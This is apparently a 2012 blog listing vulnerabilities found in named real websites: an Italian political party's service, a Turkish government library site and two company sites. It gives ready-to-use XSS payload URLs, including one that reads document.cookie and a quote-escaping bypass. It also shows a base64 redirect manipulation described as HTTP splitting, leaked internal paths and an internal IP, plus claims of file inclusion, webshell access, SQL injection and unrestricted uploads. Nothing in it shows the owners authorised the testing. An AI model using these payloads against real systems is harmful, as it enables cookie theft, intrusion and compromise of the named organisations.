Tuesday, 31 January 2012

http://servizi.pdl.it/ | XSS

http://servizi.pdl.it/cartoline/adesioni/segnala.php

just
<script>alert(document.cookie);</script>
in the form

Friday, 13 January 2012

kutuphane.tuik.gov.tr | data leak, system compromise, HTTP splitting, XSS.

-Data leak-

http://kutuphane.tuik.gov.tr/yordambt/liste.php?-skip=0&-atla=0&-sayfa=01&Alan3=&Alan5=&anatur=&bolum=&alttur=&sekil=&ortam=&dil=&yayintarihi=&kgt=&gorsel=&kurumyayini=&cAlanlar=pollo&aa=eseradi&-max=16&universite=&enstitu=&anabilimdali=&bilimdali=&sureliilkharf=&sure=&biryil=&birdergitrh=&birsayi=&biricindekiler=

we can see the full path within the errors
-> C:\Inetpub\wwwroot\yordambt
ex file: _dil.php | index.php | liste.php | _yardim.php | arama.php | anasayfa.php | url.php


After getting access through a lfi it's possible to see that we are on a (windows) box with the default configuration, with the permissions for -everybody- in some important folders. It's possible to operate quite like an administrator with a simple -webshell- script
There are some shared folders without password on other boxes
------

The scripts available from the website are (also) interacting with other webservers on the local network where are located other documents
ex.: http://10.1.2.49/pdf/0016384.pdf

this information can be taken from a simple search
sample url:
http://kutuphane.tuik.gov.tr/yordambt/url.php?-action=new&-url=aHR0cDovLzEwLjEuMi40OS9wZGYvMDAxNjM4NC5wZGY=&demirbas=0016384

where we can clearly see a base64 encoded string ( aHR0cDovLzEwLjEuMi40OS9wZGYvMDAxNjM4NC5wZGY -> http://10.1.2.49/pdf/0016384.pdf ).

and we can easily change the redirect to any other website (the location header)

this example redirects to this website/blog ( http://trueliarx.blogspot.com )
http://kutuphane.tuik.gov.tr/yordambt/url.php?-action=new&-url=aHR0cDovL3RydWVsaWFyeC5ibG9nc3BvdC5jb20v&demirbas=0016384

obviously we are facing an HTTP Splitting problem and we can add other malicious stuff instead of redirecting.


-------------------------------------------------------------------------------------

I suppose that the website have something to do with a -library-  (?). I cannot understand turkish.

Thursday, 12 January 2012

www.ascension-tech.com | XSS

this xss is locked by the webserver
www.ascension-tech.com/searchresults.asp?searWords=<script>alert(document.cookie);</script>&Go.x=0&Go.y=0

this one is working without problems because there's a javascript that is using the input without sanitizing it. It seems that only the first ' single quote is escaped.... and we add another one.
http://www.ascension-tech.com/searchresults.asp?searWords=%27%27%3Balert%28%271%27%29%3Bvar+asd%3D%27&Go.x=12&Go.y=12


The problem is within "Search Engine Builder 2010"

www.ovosodo.net | Flash XSS - Sql Injections - possible upload of scripts - administrator privileges escalation (system compromise)

(they are not working anymore - check webcaches)
www.ovosodo.net
xss in the requests (simple)

Sql injection (there's no need to write the injection string ... it's very simple)
http://www.ovosodo.net/area_clienti.asp

after *login* it's possible to upload anything that will be available in
http://www.ovosodo.net/images/upload/originali/